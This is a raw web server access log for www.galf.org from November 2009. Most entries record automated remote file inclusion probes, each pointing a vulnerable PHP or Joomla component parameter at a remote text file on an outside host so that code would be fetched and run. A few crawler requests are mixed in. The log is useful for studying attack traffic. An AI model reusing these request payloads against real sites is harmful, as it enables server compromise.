78.110.50.110 - - [22/Nov/2009:17:32:45 -0800] "GET /logs/access_090608.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:32:53 -0800] "GET /logs/access.log//error.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:32:53 -0800] "GET /logs//error.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:32:53 -0800] "GET /error.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.110 - - [22/Nov/2009:17:32:55 -0800] "GET /logs/access_090608.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.111.29 - - [22/Nov/2009:17:33:39 -0800] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:35:45 -0800] "GET /logs/access_090713.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:35:45 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:38:31 -0800] "GET /logs/access_090713.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:17:38:52 -0800] "GET /logs/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:17:38:52 -0800] "GET /logs/access_090629.log%20%20/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:17:38:53 -0800] "GET /template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:39:36 -0800] "GET /logs/access.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:39:38 -0800] "GET /logs/access.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:40:00 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:17:40:10 -0800] "GET /logs/access_090629.log%20%20/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:17:40:10 -0800] "GET /logs/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:17:40:10 -0800] "GET /template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:17:41:02 -0800] "GET /logs/access_090629.log%20%20/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:17:41:02 -0800] "GET /template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:17:41:02 -0800] "GET /logs/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:17:41:52 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.91.189.9 - - [22/Nov/2009:17:42:58 -0800] "GET /logs/access_090824.log//bemarket/postscript/postscript.php?p_mode=http://www.seorakhoney.com/shop/mail/idsatu.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.111.29 - - [22/Nov/2009:17:43:26 -0800] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:43:39 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:17:44:05 -0800] "GET /logs/access_090615.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:45:05 -0800] "GET /logs/access_090713.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.6.163.21 - - [22/Nov/2009:17:45:06 -0800] "GET /logs/access.log HTTP/1.1" 200 55217 "-" "Mozilla/8.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:48:00 -0800] "GET /logs/access_091109.log//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:48:01 -0800] "GET /logs//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:48:10 -0800] "GET /logs//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:48:10 -0800] "GET /logs/access_091109.log//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:48:10 -0800] "GET /write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:49:48 -0800] "GET /logs/access.log//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:49:48 -0800] "GET /write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:49:48 -0800] "GET /logs//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:50:13 -0800] "GET /logs/access.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:51:05 -0800] "GET /write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:51:08 -0800] "GET /logs/access.log%20%20//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:51:09 -0800] "GET /logs//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:51:13 -0800] "GET /logs/access_091026.log%20%20//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [22/Nov/2009:17:51:28 -0800] "GET /logs//appserv/errors.php?appserv_root=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [22/Nov/2009:17:51:30 -0800] "GET /logs/access.log//appserv/errors.php?appserv_root=http://yunk.fileave.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [22/Nov/2009:17:51:30 -0800] "GET /appserv/errors.php?appserv_root=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [22/Nov/2009:17:51:43 -0800] "GET /logs/access_091102.log//appserv/errors.php?appserv_root=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [22/Nov/2009:17:51:43 -0800] "GET /appserv/errors.php?appserv_root=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [22/Nov/2009:17:51:46 -0800] "GET /logs//appserv/errors.php?appserv_root=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:53:09 -0800] "GET /logs/access_090713.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:55:25 -0800] "GET /logs/access_090713.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:55:28 -0800] "GET /logs/access.log//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:55:28 -0800] "GET /logs//write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:17:55:28 -0800] "GET /write.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:55:47 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:17:57:16 -0800] "GET /logs/access_090713.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:18:00:24 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:18:00:24 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:18:00:24 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [22/Nov/2009:18:01:15 -0800] "GET /logs/access.log//index.php?get=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [22/Nov/2009:18:01:15 -0800] "GET /logs//index.php?get=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [22/Nov/2009:18:01:15 -0800] "GET /index.php?get=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:18:02:05 -0800] "GET /logs/access_090713.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [22/Nov/2009:18:02:15 -0800] "GET /logs/access.log//index.php?get=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [22/Nov/2009:18:02:15 -0800] "GET /index.php?get=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [22/Nov/2009:18:02:16 -0800] "GET /logs//index.php?get=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:18:02:41 -0800] "GET /logs/access_090309.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:18:04:49 -0800] "GET /logs/access.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:18:05:18 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:18:05:19 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:18:05:20 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:05:48 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:05:48 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:05:48 -0800] "GET /?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:05:55 -0800] "GET /logs/access_090817.log%20%20//?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:18:07:09 -0800] "GET /logs/access_090309.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:07:27 -0800] "GET /logs/access_090629.log%20%20/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:07:27 -0800] "GET /template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:07:27 -0800] "GET /logs/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:07:49 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:07:49 -0800] "GET /?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:07:50 -0800] "GET /logs/access_090629.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:07:53 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:18:08:26 -0800] "GET /logs/access_090713.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:08:36 -0800] "GET /logs/access_090511.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:08:36 -0800] "GET /logs/access_090615.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:08:36 -0800] "GET /logs/access_090420.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:08:36 -0800] "GET /logs/access_090907.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:08:44 -0800] "GET /?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:08:45 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:08:45 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [22/Nov/2009:18:08:52 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [22/Nov/2009:18:08:52 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [22/Nov/2009:18:08:52 -0800] "GET /logs/access.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [22/Nov/2009:18:09:16 -0800] "GET /logs/access_090921.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:09:31 -0800] "GET /logs/access_090525.log%20%20//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:18:09:31 -0800] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.araneola.net/contentimage/dm?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
95.108.150.235 - - [22/Nov/2009:18:11:14 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [22/Nov/2009:18:11:16 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [22/Nov/2009:18:11:17 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [22/Nov/2009:18:11:19 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [22/Nov/2009:18:11:22 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
200.108.199.16 - - [22/Nov/2009:18:11:29 -0800] "GET /logs/access_090629.log%20%20/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:11:29 -0800] "GET /logs/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:11:50 -0800] "GET /logs/access_090629.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:18:12:12 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.telephone114.com/bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:18:12:13 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.telephone114.com/bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:18:12:13 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.telephone114.com/bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:18:12:13 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.telephone114.com/bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:12:35 -0800] "GET /logs/access_090511.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:12:35 -0800] "GET /logs/access_090615.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:12:35 -0800] "GET /logs/access_090420.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [22/Nov/2009:18:12:35 -0800] "GET /logs/access_090907.log/template.php?name=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:18:13:48 -0800] "GET /logs/access_090713.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:18:15:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.telephone114.com/bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:18:16:27 -0800] "GET /logs/access_090713.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:20:52 -0800] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:18:22:26 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:18:26:07 -0800] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:18:26:07 -0800] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:28:28 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
69.42.146.14 - - [22/Nov/2009:18:28:28 -0800] "GET /?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
69.42.146.14 - - [22/Nov/2009:18:28:30 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.42.146.14 - - [22/Nov/2009:18:28:49 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:18:30:44 -0800] "GET /?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
69.42.146.14 - - [22/Nov/2009:18:30:44 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
69.42.146.14 - - [22/Nov/2009:18:30:46 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.42.146.14 - - [22/Nov/2009:18:31:00 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:18:32:44 -0800] "GET /logs/access_090713.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:18:33:01 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
